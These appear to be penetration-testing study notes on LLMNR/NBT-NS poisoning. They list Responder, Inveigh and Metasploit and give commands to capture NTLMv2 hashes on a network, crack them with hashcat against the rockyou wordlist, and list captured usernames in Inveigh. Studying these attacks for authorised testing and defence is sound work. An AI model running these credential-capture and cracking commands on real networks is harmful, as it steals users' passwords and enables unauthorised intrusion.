# LLMNR/NBT-NS Poisoning

### Several tools can be used to attempt LLMNR & NBT-NS poisoning:

| Tool                                                  | Description                                                                                         |
| ----------------------------------------------------- | --------------------------------------------------------------------------------------------------- |
| Responder                                             | Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions. |
| [Inveigh](https://github.com/Kevin-Robertson/Inveigh) | Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.      |
| Metasploit                                            | Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.  |

## From Linux

```bash
# Starting Responder 
sudo responder -I ens224

# Cracking an NTLMv2 Hash With Hashcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
```

## From Windows

```bash
# Using Inveigh C# version, powershell version is not updated
# Compile and run the executable
PS C:\> .\Inveigh.exe

# hit the esc key to enter the console while Inveigh is running.
# After typing HELP and hitting enter, we are presented with several options
# view unique captured hashes by typing GET NTLMV2UNIQUE
# type in GET NTLMV2USERNAMES and see which usernames we have collected
```